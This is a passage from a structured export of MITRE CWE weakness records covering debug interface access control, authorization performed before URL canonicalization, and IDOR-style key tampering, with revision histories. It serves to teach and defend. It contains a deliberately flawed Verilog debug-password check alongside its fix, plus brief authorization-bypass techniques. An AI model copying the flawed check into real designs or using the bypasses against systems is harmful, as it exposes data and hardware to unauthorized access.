"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, References",
"ModificationDate": "2024-02-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": "2024-02-29",
"ModificationVersion": "4.14",
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": "clarified differences between CWE-1191 and CWE-1244, and suggested rephrasing of descriptions and names.",
"ContributionDate": "2021-10-22",
"ContributionName": "Hareesh Khattri",
"ContributionOrganization": "Intel Corporation",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": "suggested demonstrative example",
"ContributionDate": "2023-11-07",
"ContributionName": "Chen Chen, Rahul Kande, Jeyavijayan Rajendran",
"ContributionOrganization": "Texas A&M University",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": "suggested demonstrative example",
"ContributionDate": "2023-11-07",
"ContributionName": "Shaza Zeitouni, Mohamadreza Rostami, Ahmad-Reza Sadeghi",
"ContributionOrganization": "Technical University of Darmstadt",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2020-08-20",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Improper Authorization on Physical Debug and Test Interfaces",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2021-10-28",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Improper Access to Sensitive Information Using Debug and Test Interfaces",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "863",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] |
[
{
"Description": null,
"Ordinality": "Primary"
}
] |
[
{
"Description": "Check 2 devices for their passcode to authenticate access to JTAG/debugging ports. If the passcodes are missing or the same, update the design to fix and retest. Check communications over JTAG/debugging ports for encryption. If the communications are not encrypted, fix the design and retest.",
"DetectionMethodID": null,
"Effectiveness": "Moderate",
"EffectivenessNotes": null,
"Method": "Manual Analysis"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The JTAG interface is used to perform debugging and provide CPU core access for developers. JTAG-access protection is implemented as part of the JTAG_SHIELD bit in the hw_digctl_ctrl register. This register has no default value at power up and is set only after the system boots from ROM and control is transferred to the user software.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "| | \n|\n| 1 bit | 0x0 = JTAG debugger is enabled (default) |\n| JTAG_SHIELD | 0x1 = JTAG debugger is disabled |",
"IntroText": null,
"Language": "Other",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "This means that since the end user has access to JTAG at system reset and during ROM code execution before control is transferred to user software, a JTAG user can modify the boot flow and subsequently disclose all CPU information, including data-encryption keys.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tThe default value of this register bit should be set to 1 to prevent the JTAG from being enabled at system reset.\n```",
"IntroText": null,
"Language": null,
"Nature": "Informative",
"Reference": null
}
],
"ID": null
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The example code below is taken from the CVA6 processor core of the HACK@DAC'21 buggy OpenPiton SoC. Debug access allows users to access internal hardware registers that are otherwise not exposed for user access or restricted access through access control protocols. Hence, requests to enter debug mode are checked and authorized only if the processor has sufficient privileges. In addition, debug accesses are also locked behind password checkers. Thus, the processor enters debug mode only when the privilege level requirement is met, and the correct debug password is provided.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "The following code [REF-1377] illustrates an instance of a vulnerable implementation of debug mode. The core correctly checks if the debug requests have sufficient privileges and enables the debug_mode_d and debug_mode_q signals. It also correctly checks for debug password and enables umode_i signal.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "module csr_regfile #(\n ...\n\n```\n\t // check that we actually want to enter debug depending on the privilege level we are currently in\n\t unique case (priv_lvl_o)\n\t\t riscv::PRIV_LVL_M: begin\n\t\t\t debug_mode_d = dcsr_q.ebreakm;\n ...\n\t\t riscv::PRIV_LVL_U: begin\n\t\t\t debug_mode_d = dcsr_q.ebreaku;\n ...\n```\nassign priv_lvl_o = (debug_mode_q || umode_i) ? riscv::PRIV_LVL_M : priv_lvl_q;** \n\t ...\n\n```\n\t debug_mode_q <= debug_mode_d;\n ...\n```",
"IntroText": null,
"Language": "Verilog",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "However, it grants debug access and changes the privilege level, priv_lvl_o, even when one of the two checks is satisfied and the other is not. Because of this, debug access can be granted by simply requesting with sufficient privileges (i.e., debug_mode_q is enabled) and failing the password check (i.e., umode_i is disabled). This allows an attacker to bypass the debug password checking and gain debug access to the core, compromising the security of the processor.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "A fix to this issue is to only change the privilege level of the processor when both checks are satisfied, i.e., the request has enough privileges (i.e., debug_mode_q is enabled) and the password checking is successful (i.e., umode_i is enabled) [REF-1378].",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "module csr_regfile #(\n ...\n\n```\n\t // check that we actually want to enter debug depending on the privilege level we are currently in\n\t unique case (priv_lvl_o)\n\t\t riscv::PRIV_LVL_M: begin\n\t\t\t debug_mode_d = dcsr_q.ebreakm;\n ...\n\t\t riscv::PRIV_LVL_U: begin\n\t\t\t debug_mode_d = dcsr_q.ebreaku;\n ...\n\t assign priv_lvl_o = \n```\n(debug_mode_q && umode_i) ? riscv::PRIV_LVL_M : priv_lvl_q;** \n\t ...\n\n```\n\t debug_mode_q <= debug_mode_d;\n ...\n```",
"IntroText": null,
"Language": "Verilog",
"Nature": "Good",
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"285",
"863",
"1244"
]
] |
[] |
551
|
Incorrect Behavior Order: Authorization Before Parsing and Canonicalization
|
Base
|
Simple
|
Incomplete
|
If a web server does not fully parse requested URLs before it examines them for authorization, it may be possible for an attacker to bypass authorization protection.
|
For instance, the character strings /./ and / both mean current directory. If /SomeDirectory is a protected directory and an attacker requests /./SomeDirectory, the attacker may be able to gain access to the resource if /./ is not converted to / before the authorization check is performed.
| null | null |
[
{
"Note": "REALIZATION: This weakness is caused during implementation of an architectural security tactic.",
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Bypass Protection Mechanism"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Access Control"
]
}
] |
[
{
"Description": "URL Inputs should be decoded and canonicalized to the application's current internal representation before being validated and processed for authorization. Make sure that your application does not decode the same input twice. Such errors could be used to bypass allowlist schemes by introducing dangerous inputs after they have been checked.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
}
] | null | null | null | null | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "Anonymous Tool Vendor (under NDA)",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations, Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings, Type",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2009-03-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2009-07-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Demonstrative_Examples, Description, Relationships",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Modes_of_Introduction, Relationships, Taxonomy_Mappings",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2020-06-25",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2008-04-11",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Authentication Before Parsing and Canonicalization",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "863",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
},
{
"CweID": "696",
"Nature": "ChildOf",
"Ordinal": null,
"ViewID": "1000"
}
] | null | null | null | null | null | null | null | 2
|
[
[
"284",
"285",
"863",
"551"
],
[
"691",
"696",
"551"
]
] |
[] |
639
|
Authorization Bypass Through User-Controlled Key
|
Base
|
Simple
|
Incomplete
|
The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data.
|
Retrieval of a user record occurs in the system based on some key value that is under user control. The key would typically identify a user-related record stored in the system and would be used to lookup that record for presentation to the user. It is likely that an attacker would have to be an authenticated user in the system. However, the authorization process would not properly check the data access operation to ensure that the authenticated user performing the operation has sufficient entitlements to perform the requested data access, hence bypassing any other authorization checks present in the system.
For example, attackers can look at places where user specific data is retrieved (e.g. search screens) and determine whether the key for the item being looked up is controllable externally. The key may be a hidden field in the HTML form field, might be passed as a URL parameter or as an unencrypted cookie variable, then in each of these cases it will be possible to tamper with the key value.
One manifestation of this weakness is when a system uses sequential or otherwise easily-guessable session IDs that would allow one user to easily switch to another user's session and read/modify their data.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
}
] |
[
{
"Description": "The \"Insecure Direct Object Reference\" term, as described in the OWASP Top Ten, is broader than this CWE because it also covers path traversal (CWE-22). Within the context of vulnerability theory, there is a similarity between the OWASP concept and CWE-706: Use of Incorrectly-Resolved Name or Reference.",
"Term": "Insecure Direct Object Reference / IDOR"
},
{
"Description": "BOLA is used in the 2019 OWASP API Security Top 10 and is said to be the same as IDOR.",
"Term": "Broken Object Level Authorization / BOLA"
},
{
"Description": "\"Horizontal Authorization\" is used to describe situations in which two users have the same privilege level, but must be prevented from accessing each other's resources. This is fairly common when using key-based access to resources in a multi-user context.",
"Term": "Horizontal Authorization"
}
] |
[
{
"Note": "REALIZATION: This weakness is caused during implementation of an architectural security tactic.",
"Phase": "Architecture and Design"
}
] |
[
{
"Impact": [
"Bypass Protection Mechanism"
],
"Likelihood": null,
"Note": "Access control checks for specific user data or functionality can be bypassed.",
"Scope": [
"Access Control"
]
},
{
"Impact": [
"Gain Privileges or Assume Identity"
],
"Likelihood": null,
"Note": "Horizontal escalation of privilege is possible (one user can view/modify information of another user).",
"Scope": [
"Access Control"
]
},
{
"Impact": [
"Gain Privileges or Assume Identity"
],
"Likelihood": null,
"Note": "Vertical escalation of privilege is possible if the user-controlled key is actually a flag that indicates administrator status, allowing the attacker to gain administrative access.",
"Scope": [
"Access Control"
]
}
] |
[
{
"Description": "For each and every data access, ensure that the user has sufficient privilege to access the record that is being requested.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "Make sure that the key that is used in the lookup of a specific user's record is not controllable externally by the user or that any tampering can be detected.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design",
"Implementation"
],
"Strategy": null
},
{
"Description": "Use encryption in order to make it more difficult to guess other legitimate values of the key or associate a digital signature with the key so that the server can verify that there has been no tampering.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
}
] |
[
{
"Description": "An educational application does not appropriately restrict file IDs to a particular user. The attacker can brute-force guess IDs, indicating IDOR.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2021-36539",
"Reference": "CVE-2021-36539"
}
] | null | null | null | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2008-01-30",
"SubmissionName": "Evgeny Lebanidze",
"SubmissionOrganization": "Cigital",
"SubmissionReleaseDate": "2008-01-30",
"SubmissionVersion": "Draft 8",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Relationships, Type",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2008-10-14",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2009-03-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2009-05-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2009-10-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2010-06-21",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Alternate_Terms, Applicable_Platforms, Description, Name, Potential_Mitigations, Relationships",
"ModificationDate": "2011-03-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Relationships",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Alternate_Terms, Common_Consequences",
"ModificationDate": "2013-02-21",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2013-07-17",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2014-07-30",
